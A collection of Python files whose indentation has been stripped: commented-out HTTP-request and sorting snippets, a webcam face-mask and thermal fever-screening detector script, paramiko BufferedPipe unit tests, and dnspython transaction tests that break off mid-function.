# payload = {"username": "John", "password": "testing123"}
# r = requests.post("https://httpbin.org/post", data=payload)
# r_dict = r.json()
#
# # Basic Auth
# r = requests.get(
# "https://httpbin.org/basic-auth/john/testing123", auth=("john", "testing123")
# )
# print(r.text)
"""
Python Search Algorithmns
"""
# def bubble_sort(arr):
# n = len(arr)
#
# for u in range(n):
# for v in range(0, n - u - 1):
# if arr[v] > arr[v + 1]:
# arr[v], arr[v + 1] = arr[v + 1], arr[v]
# return arr
#
#
# def selection_sort(arr):
# indexing_length = range(0, len(arr) - 1)
#
# for i in indexing_length:
# min_value = i
#
# for j in range(i + 1, len(arr)):
# if arr[j] < arr[min_value]:
# min_value = j
#
# if min_value != i:
# arr[min_value], arr[i] = arr[i], arr[min_value]
#
# return arr
#
#
# print(selection_sort([1, 6, 3, 6, 3, 8, 23, 4, 2, 1, 7]))
|
detector.py
|
"""
The detector.py file is used to determine whether a person is wearing a mask or not.
It uses detect_and_predict_mask function that takes in a single frame from the live
stream, a face_net used to determine faces in the frame and mask_net used to determine
whether the faces detected are wearing masks or not. mask_net is a pre-trained model,
that has been trained using the learning_algo.py. When the aglorithm is run it starts
a live stream from which it uses every frame to determine whether the person in that
frame is wearing a mask. It displays a green box around the face if the person is wearing
the mask and a red one if they are not wearing a mask.
THe -f or --face flag can be used to provide the path to the face detector model. The -f
only needs to be used if another model is to be used to detect faces in a frame. The -m
or --model flag can be used to provide a path to the pre-trained mask detection model.
The -c or --confidence flag can be used to provide an optional probability threshold
that would override the default 50% to filter weak face detections.
"""
# import the necessary packages
import argparse
import os
import subprocess
import signal
import multiprocessing
import sys
from sys import platform
import cv2
import tensorflow as tf
import numpy as np
from screeninfo import get_monitors
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
# Returns visible faces and their facemask predicitons.
def detect_and_predict_mask(frame, face_net, mask_net, confidence_arg, shared_dict):
# Grab the dimensions of the frame and then construct a blob from it
(H, W) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300),(104.0, 177.0, 123.0))
# Pass the blob through the network and obtain the face detections
face_net.setInput(blob)
detections = face_net.forward()
# Initialize our list of faces, their corresponding locations, and the list of predictions from our face mask network
faces = []
locs = []
preds = []
# loop over the detections
for i in range(0, detections.shape[2]):
# Extract the confidence (i.e., probability) associated with the detection
confidence = detections[0, 0, i, 2]
# Filter out weak detections by ensuring the confidence is greater than the minimum confidence
if confidence > confidence_arg:
# Compute the (x, y)-coordinates of the bounding box for the object
box = detections[0, 0, i, 3:7] * np.array([W, H, W, H])
(start_x, start_y, end_x, end_y) = box.astype("int")
# Wider margin for face
(start_x, start_y, end_x, end_y) = (int(start_x*0.95), int(start_y*0.95), int(end_x*1.05), int(end_y*1.05))
# Ensure the bounding boxes fall within the dimensions of the frame
(start_x, start_y) = (max(0, start_x), max(0, start_y))
(end_x, end_y) = (min(W - 1, end_x), min(H - 1, end_y))
# Extract the face ROI, convert it from BGR to RGB channel ordering, resize it to 224x224, and preprocess it
face = frame[start_y:end_y, start_x:end_x]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
# Add the face and bounding boxes to their respective lists
faces.append(face)
locs.append((start_x, start_y, end_x, end_y))
# Only make a predictions if at least one face was detected
if len(faces) > 0:
# for faster inference we'll make batch predictions on *all*
# faces at the same time rather than one-by-one predictions
# in the above `for` loop
faces = np.array(faces, dtype="float32")
preds = mask_net.predict(faces, batch_size=32)
shared_dict['facemask_detector_status'] = True
# Return a 2-tuple of the face locations and their corresponding predections
return (locs, preds)
# Parses the thermal grabber program's STDOUT as thermal data and debug information.
def thermal_grabber_worker(shared_dict, thermal_program_path, FLIP_THERMAL):
# Opens a subprocess to the thermal grabber
thermal_grabber = subprocess.Popen(["./thermal_grabber"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=thermal_program_path, bufsize=1)
concat_data = ""
for line in iter(thermal_grabber.stdout.readline, b''):
# Allow the C++ program to handle its termination
if shared_dict['thermal_process_terminate']:
thermal_grabber.send_signal(signal.SIGINT)
break
# The following statements parse the raw STDOUT data as a numpy array.
data = line.decode("utf-8").rstrip()
if data == "":
continue
if data[0] == "[" and data[-1] == ";":
shared_dict['resync_count'] = 0
concat_data = data[1:-1] + ", "
elif data[-1] == ";":
shared_dict['resync_count'] = 0
concat_data = concat_data + data[:-1] + ", "
elif data[-1] == "]" and concat_data != "":
shared_dict['resync_count'] = 0
concat_data = concat_data + data[:-1]
try:
data_array = np.fromstring(concat_data, np.uint16, sep=',')
except:
if debug:
print("[WARNING] Received invalid thermal array (np.fromstring)")
concat_data = ""
continue
if data_array.size != 19200:
if debug:
print("[WARNING] Received invalid size of thermal array: " + str(data_array.size) + " != 19200")
concat_data = ""
continue
thermal_data = np.reshape(data_array, (120,160))
if FLIP_THERMAL:
thermal_data = cv2.rotate(thermal_data, cv2.ROTATE_180)
shared_dict['thermal_data'] = thermal_data
# Create a copy of the thermal data to process as a thermal image frame
thermal_frame = thermal_data.copy()
# Resize thermal image for output
cv2.normalize(thermal_frame, thermal_frame, 0, 255, cv2.NORM_MINMAX)
thermal_width = int(thermal_frame.shape[1] * THERMAL_SCALE_FACTOR)
thermal_height = int(thermal_frame.shape[0] * THERMAL_SCALE_FACTOR)
thermal_dim = (thermal_width, thermal_height)
thermal_frame = cv2.resize(thermal_frame, thermal_dim, interpolation = cv2.INTER_AREA)
thermal_frame = cv2.cvtColor(thermal_frame,cv2.COLOR_GRAY2RGB)
thermal_frame = np.uint8(thermal_frame)
shared_dict['thermal_frame'] = thermal_frame
concat_data = ""
elif "," in data:
shared_dict['resync_count'] = 0
if data[-1] != ",":
concat_data = concat_data + data + ","
else:
concat_data = concat_data + data
elif "RESYNC" in data:
concat_data = ""
shared_dict['resync_count'] += 1
print(data)
else:
concat_data = ""
shared_dict['resync_count'] = 0
print(data)
print("[INFO] Thermal subprocess closed.")
def facemask_worker(shared_dict, face_arg, mask_arg, confidence_arg):
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Allow GPU memory usage to change automatically
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
print(e)
# Load our serialized face detector model from disk
print("[INFO] loading face detector model...")
prototxt_path = os.path.sep.join([face_arg, "deploy.prototxt"])
weights_path = os.path.sep.join([face_arg, "res10_300x300_ssd_iter_140000.caffemodel"])
face_net = cv2.dnn.readNet(prototxt_path, weights_path)
# Load the face mask detector model from disk
print("[INFO] loading face mask detector model...")
mask_net = load_model(mask_arg)
print("[INFO] face mask detector model loaded.")
while True:
if shared_dict['frame'] is not None:
shared_dict['locs'], shared_dict['preds'] = detect_and_predict_mask(shared_dict['frame'], face_net, mask_net, confidence_arg, shared_dict)
if __name__ == '__main__':
# Construct the argument parser and parse the arguments
MAIN_DIR = os.getcwd()
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--face", type=str,
default="face_detector",
help="Path to face detector model directory")
ap.add_argument("-m", "--model", type=str,
default="mask_detector.model",
help="Path to trained face mask detector model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
help="Minimum probability to filter weak detections")
# Thermal mode switch
ap.add_argument("-t", "--thermal", dest="thermal", action="store_true", help="Activate thermal mode")
# Thermal overlay switch
ap.add_argument("-to", "--thermaloverlay", dest="thermaloverlay", action="store_true", help ="Display thermal overlay")
# Debug mode switch
ap.add_argument("-d", "--debug", dest="debug", action="store_true", help ="Activate debug mode")
# Flip thermal switch
ap.add_argument("-ft", "--flipthermal", dest="flipthermal", action="store_true", help ="Flip thermal image 108 degrees")
# Use temperature offset config file
ap.add_argument("-uo", "--useoffset", dest="useoffset", action="store_true", help ="Use offset configuration file")
# Fullscreen switch
ap.add_argument("-fs", "--fullscreen", dest="fullscreen", action="store_true", help ="Use fullscreen mode")
ap.set_defaults(thermal=False, debug=False, flipthermal=False, useoffset=False, fullscreen=False)
# Thermal program path setup
thermal_program_path = os.path.join(MAIN_DIR, "thermal_grabber/build/thermal_grabber")
ap.add_argument("-tp", "--thermalprogram", type=str, default=thermal_program_path, help="Thermal program path")
args = vars(ap.parse_args())
debug = args["debug"]
if platform == "linux":
# FR:30Hz dFoV:78° Logitech C920
webcam_cap = cv2.VideoCapture(0, cv2.CAP_V4L2)
W, H = 800, 600
webcam_cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'))
webcam_cap.set(cv2.CAP_PROP_FRAME_WIDTH, W)
webcam_cap.set(cv2.CAP_PROP_FRAME_HEIGHT, H)
webcam_cap.set(cv2.CAP_PROP_FPS, 30)
else:
webcam_cap = cv2.VideoCapture(0)
W, H = 1920, 1080
webcam_cap.set(cv2.CAP_PROP_FRAME_WIDTH, W)
webcam_cap.set(cv2.CAP_PROP_FRAME_HEIGHT, H)
# Fullscreen setup
fullscreen_mode = args["fullscreen"]
MONITOR_INFO = get_monitors()[0]
print("[INFO] Fullscreen mode: " + str(fullscreen_mode))
# Display video stream info
print("[INFO] starting video stream...")
print("[INFO] Video stream active: " + str(webcam_cap.isOpened()))
# GUI constants
# Facemask confidence level minimum
FACEMASK_CONFIDENCE = 0.80
GUI_FONT = cv2.FONT_HERSHEY_DUPLEX
TEXT_SCALE = 1
SUCCESS_COLOUR = (0, 255, 0) # Green
WARNING_COLOUR = (0, 0, 255) # Red
COLD_COLOUR = (255, 0, 9) # Blue
UNKNOWN_COLOUR = (128, 128, 128) # Grey
# Multiprocessing setup
manager = multiprocessing.Manager()
shared_dict = manager.dict()
shared_dict['facemask_detector_status'] = False
shared_dict['frame'] = None
shared_dict['locs'] = []
shared_dict['preds'] = []
shared_dict['thermal_process_terminate'] = False
shared_dict['resync_count'] = 0
# Thermal program setup
THERMAL_MODE = args['thermal']
thermal_program_path = args["thermalprogram"]
# Thermal constant values
# Based on temperature range from Lepton on HIGH gain mode [0-150°C]
THERMAL_CONVERSION = 0.0092
TEMP_MINIMUM = 32
TEMP_MAXIMUM = 42
TEMP_FEVER = 38
THERMAL_SCALE_FACTOR = 5
FLIP_THERMAL = args['flipthermal']
temp_offset = 0
# Copy of the original offset so we can reset it using the 'r' key later.
TEMP_OFFSET_ORG = temp_offset
# Get thermal settings from arguments
thermal_overlay = args['thermaloverlay']
USE_OFFSET = args['useoffset']
# Check that thermal grabber program is present in the specified directory.
# Check that the temperature offset configuration file is available if it is required.
if THERMAL_MODE:
print("[INFO] Thermal mode: ON")
print("[INFO] Checking thermal program path...")
if not os.path.exists(thermal_program_path):
print("[ERROR] Provided thermal program path does not exist: " + thermal_program_path)
sys.exit(1)
else:
print("[SUCCESS] Provided thermal program path exists.")
if USE_OFFSET:
print("[INFO] Getting temperature offset...")
try:
with open("TEMP_OFFSET.dat", "r") as offset_file:
temp_offset = float(offset_file.readline().strip())
TEMP_OFFSET_ORG = temp_offset
print("[SUCCESS] Thermal offset set: " + str(temp_offset))
except Exception as e:
print("[WARNING] There was an error retrieving your offset from TEMP_OFFSET", e)
else:
print("[INFO] Thermal mode: OFF")
# Start the thermal subprocess
if THERMAL_MODE:
shared_dict['thermal_data'] = None
shared_dict['thermal_frame'] = None
thermal_grabber_process = multiprocessing.Process(target=thermal_grabber_worker, args=(shared_dict, thermal_program_path, FLIP_THERMAL))
thermal_grabber_process.start()
output_window = 'Mask Detecting Stream (Thermal)'
else:
output_window = 'Mask Detecting Stream'
# Start the facemask subprocess
facemask_process = multiprocessing.Process(target=facemask_worker, args=(shared_dict, args["face"], args["model"], args["confidence"]))
facemask_process.start()
# Prcoess the thermal data and take an average temperature from the forehead
def process_thermal_data(thermal_data, start_point, end_point):
measure_point_x, measure_point_y = (start_point[0] + ((end_point[0] - start_point[0]) // 2)), (start_point[1] + ((end_point[1] - start_point[1]) // 6))
# Create a margin for a larger sample size.
x_margin = ((end_x - start_x)/5)
y_margin = ((end_y - start_y)/20)
# Scale the margin for use on the thermal data.
x_margin_scaled = x_margin // THERMAL_SCALE_FACTOR
y_margin_scaled = y_margin // THERMAL_SCALE_FACTOR
# Scale the measuring points for use on the thermal data.
measure_point_x_scaled = measure_point_x // THERMAL_SCALE_FACTOR
measure_point_y_scaled = measure_point_y // THERMAL_SCALE_FACTOR
# Get all thermal data from within our margin box.
measure_point_data = thermal_data[int(measure_point_y_scaled-y_margin_scaled):int(measure_point_y_scaled+y_margin_scaled), int(measure_point_x_scaled-x_margin_scaled):int(measure_point_x_scaled+x_margin_scaled)]
avg_temp = np.average(measure_point_data)*THERMAL_CONVERSION+temp_offset
label_avg_temp = str(round(avg_temp, 1)) + " C"
temperature_bound = ((int((measure_point_x-x_margin)*frame_scale), int((measure_point_y-y_margin)*frame_scale)),
(int((measure_point_x+x_margin)*frame_scale), int((measure_point_y+y_margin)*frame_scale)))
return avg_temp, label_avg_temp, temperature_bound
# Resize frame to fit fullscreen, keeping aspect ratio
def fullscreen_resize(frame):
frame_height, frame_width = frame.shape[:2]
scale_width = float(MONITOR_INFO.width)/float(frame_width)
scale_height = float(MONITOR_INFO.height)/float(frame_height)
if scale_height>scale_width:
frame_scale = scale_width
else:
frame_scale = scale_height
new_x, new_y = frame.shape[1]*frame_scale, frame.shape[0]*frame_scale
frame = cv2.resize(frame,(int(new_x),int(new_y)), interpolation=cv2.INTER_NEAREST)
# Allows us to pad the frame later to centre align it.
frame_width_diff = MONITOR_INFO.width - new_x
frame_height_diff = MONITOR_INFO.height - new_y
return frame, frame_scale, (frame_width_diff, frame_height_diff)
# MAIN DRIVER LOOP
while True:
# Read frame from webcam.
_, webcam_frame = webcam_cap.read()
# Get the thermal data/frame from the thermal grabber subprocess.
thermal_status = False
if THERMAL_MODE:
# Retrieve thermal info from the subprocess
thermal_data, thermal_frame, resync_count = shared_dict['thermal_data'], shared_dict['thermal_frame'], shared_dict['resync_count']
# If there is no thermal data available or the thermal camera is in a resync state, turn thermal mode off temporarily
if thermal_data is None or thermal_frame is None or resync_count > 6:
thermal_status = False
else:
thermal_status = True
# If thermal mode is not active set default values.
else:
thermal_data, thermal_frame, resync_count = None, None, 0
# Pass frame for processing
shared_dict['frame'] = webcam_frame
# Show the thermal frame overlayed ontop of the webcam frame.
if thermal_status and thermal_overlay:
alpha = 0.35
beta = (1.0 - alpha)
output_frame = cv2.addWeighted(thermal_frame, alpha, webcam_frame, beta, 0.0)
else:
output_frame = webcam_frame
# Resize fullscreen output, keeping aspect ratio intact.
frame_scale = 1
if fullscreen_mode:
output_frame, frame_scale, frame_diff = fullscreen_resize(output_frame)
#TEXT_SCALE = 0.5 + (0.5 * frame_scale)
TEXT_SCALE = frame_scale
# If in debug mode show the ambient/room temperature.
if thermal_status and debug:
average_temperature = np.average(thermal_data)*THERMAL_CONVERSION+temp_offset
cv2.putText(output_frame, "Ambient: " + str(round(average_temperature,1)) + " C", (int(35 * TEXT_SCALE), int(35 * TEXT_SCALE)),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# If in debug mode show the thermal offset value.
if debug and temp_offset != 0:
cv2.putText(output_frame, "Offset: " + str(temp_offset) + " C", (int(35 * TEXT_SCALE), int(70 * TEXT_SCALE)),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# Detect faces in the frame and determine if they are wearing a face mask or not.
(locs, preds) = shared_dict['locs'], shared_dict['preds']
# Loop over the detected face locations and their corresponding locations.
for (box, pred) in zip(locs, preds):
# Unpack the face bounding box and facemask predictions.
(start_x, start_y, end_x, end_y) = box
(withoutMask, mask) = pred
# If there is thermal data available, get the forehead temperature.
avg_temp = None
if thermal_status:
avg_temp, label_avg_temp, temperature_bound = process_thermal_data(thermal_data, (start_x, start_y), (end_x, end_y))
# If there is no thermal data available display a message to the user prompting them to wait.
elif THERMAL_MODE:
cv2.rectangle(output_frame, (0, 0), (output_frame.shape[1], output_frame.shape[0]//5), (0,0,0), -1, cv2.LINE_AA)
cv2.putText(output_frame, "Waiting for thermal camera...", (output_frame.shape[0]//10, output_frame.shape[0]//10),
GUI_FONT, 1, (255,255,255), 2, cv2.LINE_AA)
# Scale bounding box by the fullscreen scaling
if fullscreen_mode:
start_x, start_y, end_x, end_y = int(start_x * frame_scale), int(start_y * frame_scale), int(end_x * frame_scale), int(end_y * frame_scale)
# Determine the class label and color we'll use to draw the bounding box and text
mask_label = "Mask" if mask > withoutMask else "No Mask"
mask_colour = SUCCESS_COLOUR if mask_label == "Mask" else WARNING_COLOUR
# Confidence interval for the predictions.
if mask < FACEMASK_CONFIDENCE and withoutMask < FACEMASK_CONFIDENCE:
mask_label = "Look at the camera please!"
mask_colour = UNKNOWN_COLOUR
# Display appropriate messages to the user
elif thermal_status:
# If wearing mask and normal body temperature
if mask > FACEMASK_CONFIDENCE and (avg_temp > TEMP_MINIMUM and avg_temp < TEMP_FEVER):
message_label = "You may enter!"
temperature_colour = SUCCESS_COLOUR
message_colour = SUCCESS_COLOUR
# If not wearing a mask and normal body temperature
elif withoutMask > FACEMASK_CONFIDENCE and (avg_temp > TEMP_MINIMUM and avg_temp < TEMP_FEVER):
message_label = "Please wear a mask!"
temperature_colour = SUCCESS_COLOUR
message_colour = WARNING_COLOUR
# Fever alert (outside of normal body temperature)
elif (avg_temp >= TEMP_FEVER):
message_label = "FEVER WARNING!"
secondary_label = "DO NOT ENTER"
temperature_colour = WARNING_COLOUR
message_colour = WARNING_COLOUR
mask_colour = WARNING_COLOUR
# Warning outline to differentiate from background
cv2.putText(output_frame, secondary_label, (start_x, int(end_y + (30 * TEXT_SCALE))),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Large warning
cv2.putText(output_frame, secondary_label, (start_x, int(end_y + (30 * TEXT_SCALE))),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, message_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# User is too cold to get accurate temperature
else:
message_label = "Heat up and try again!"
temperature_colour = COLD_COLOUR
message_colour = COLD_COLOUR
# Display temperature box
cv2.rectangle(output_frame, temperature_bound[1], temperature_bound[0], temperature_colour, 1, cv2.LINE_AA)
# Message outline to differentiate from background
cv2.putText(output_frame, message_label, (start_x, start_y - int(70 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display message assigned above
cv2.putText(output_frame, message_label, (start_x, start_y - int(70 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, message_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# Temperature outline to differentiate from background
cv2.putText(output_frame, label_avg_temp, (start_x, start_y - int(40 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display body temperature
cv2.putText(output_frame, label_avg_temp, (start_x, start_y - int(40 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, temperature_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# Include the probability in the label
mask_label = "{}: {:.2f}%".format(mask_label, max(mask, withoutMask) * 100)
# Label outline to differentiate from background
cv2.putText(output_frame, mask_label, (start_x, start_y - int(10 * TEXT_SCALE)), cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display the label and bounding box rectangle on the output
cv2.putText(output_frame, mask_label, (start_x, start_y - int(10 * TEXT_SCALE)), cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, mask_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
cv2.rectangle(output_frame, (start_x, start_y), (end_x, end_y), mask_colour, 2, cv2.LINE_AA)
# Facemask detection loading screen
if not shared_dict['facemask_detector_status']:
cv2.rectangle(output_frame, (0, 0), (output_frame.shape[1], output_frame.shape[0]//5), (0,0,0), -1, cv2.LINE_AA)
cv2.putText(output_frame, "Face mask detection is loading...", (output_frame.shape[0]//10, output_frame.shape[0]//10),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# Draw fullscreen window or standard window depending on mode
if fullscreen_mode:
# Centre align frame
frame_h_padding = int(frame_diff[1]//2)
frame_w_padding = int(frame_diff[0]//2)
output_frame = cv2.copyMakeBorder(output_frame, frame_h_padding, frame_h_padding, frame_w_padding, frame_w_padding, cv2.BORDER_CONSTANT, value=(0,))
cv2.namedWindow(output_window, cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(output_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
else:
cv2.namedWindow(output_window, cv2.WND_PROP_AUTOSIZE)
cv2.setWindowProperty(output_window, cv2.WND_PROP_AUTOSIZE, cv2.WINDOW_NORMAL)
cv2.imshow(output_window, output_frame)
# Get key press
key = cv2.waitKey(1)
# Quit key
if key == ord('q'):
break
# Toggle debug mode (ambient temperature and offset shown)
if key == ord('d'):
debug = not debug
print("[INFO] Debug mode: " + str(debug))
# Toggle thermal overlay
elif key == ord('o') and THERMAL_MODE:
thermal_overlay = not thermal_overlay
print("[INFO] Thermal overlay: " + str(thermal_overlay))
# Change thermal offset
elif key == ord('u') and THERMAL_MODE:
temp_offset += 0.25
print("[INFO] Temperature offset (+0.25 C): " + str(temp_offset) + " C")
elif key == ord('j') and THERMAL_MODE:
temp_offset -= 0.25
print("[INFO] Temperature offset (-0.25 C): " + str(temp_offset) + " C")
elif key == ord('r') and THERMAL_MODE:
temp_offset = TEMP_OFFSET_ORG
print("[INFO] Temperature offset reset to: " + str(temp_offset) + " C")
# Toggle fullscreen
elif key == ord('f'):
fullscreen_mode = not fullscreen_mode
cv2.destroyWindow(output_window)
print("[INFO] Fullscreen mode: " + str(fullscreen_mode))
print("[INFO] Thank you for using mask detection!")
# Clean up and shutdown
facemask_process.terminate()
if THERMAL_MODE:
shared_dict['thermal_process_terminate'] = True
thermal_grabber_process.join()
cv2.destroyAllWindows()
|
test_buffered_pipe.py
|
# Copyright (C) 2006-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Some unit tests for BufferedPipe.
"""
import threading
import time
import unittest
from paramiko.buffered_pipe import BufferedPipe, PipeTimeout
from paramiko import pipe
from paramiko.py3compat import b
def delay_thread(p):
p.feed('a')
time.sleep(0.5)
p.feed('b')
p.close()
def close_thread(p):
time.sleep(0.2)
p.close()
class BufferedPipeTest(unittest.TestCase):
def test_1_buffered_pipe(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
p.feed('hello.')
self.assertTrue(p.read_ready())
data = p.read(6)
self.assertEqual(b'hello.', data)
p.feed('plus/minus')
self.assertEqual(b'plu', p.read(3))
self.assertEqual(b's/m', p.read(3))
self.assertEqual(b'inus', p.read(4))
p.close()
self.assertTrue(not p.read_ready())
self.assertEqual(b'', p.read(1))
def test_2_delay(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
threading.Thread(target=delay_thread, args=(p,)).start()
self.assertEqual(b'a', p.read(1, 0.1))
try:
p.read(1, 0.1)
self.assertTrue(False)
except PipeTimeout:
pass
self.assertEqual(b'b', p.read(1, 1.0))
self.assertEqual(b'', p.read(1))
def test_3_close_while_reading(self):
p = BufferedPipe()
threading.Thread(target=close_thread, args=(p,)).start()
data = p.read(1, 1.0)
self.assertEqual(b'', data)
def test_4_or_pipe(self):
p = pipe.make_pipe()
p1, p2 = pipe.make_or_pipe(p)
self.assertFalse(p._set)
p1.set()
self.assertTrue(p._set)
p2.set()
self.assertTrue(p._set)
p1.clear()
self.assertTrue(p._set)
p2.clear()
self.assertFalse(p._set)
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text("example"), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text("content", 300, "in", "txt", "content")
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text("content", None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b"content",)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.add(rrset2)
expected = dns.rrset.from_text(
"foo", 300, "in", "a", "10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"
)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text("nonexistent", None))
content = dns.name.from_text("content", None)
content2 = dns.name.from_text("content2", None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text("content", 300, "in", "txt", "new-content")
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text("content2", 300, "in", "txt", "new-content")
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("content", 300, "in", "txt", "bad-content")
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text("content2", 300, "in", "txt", "bad-content")
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text("content", 300, "in", "txt", "content")
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text("foo", None)
rdataset = dns.rdataset.from_text("in", "a", 300, "10.0.0.1", "10.0.0.2")
rdata1 = dns.rdata.from_text("in", "a", "10.0.0.3")
rdata2 = dns.rdata.from_text("in", "a", "10.0.0.4")
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text(
"foo", 30, "in", "a", "10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"
)
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
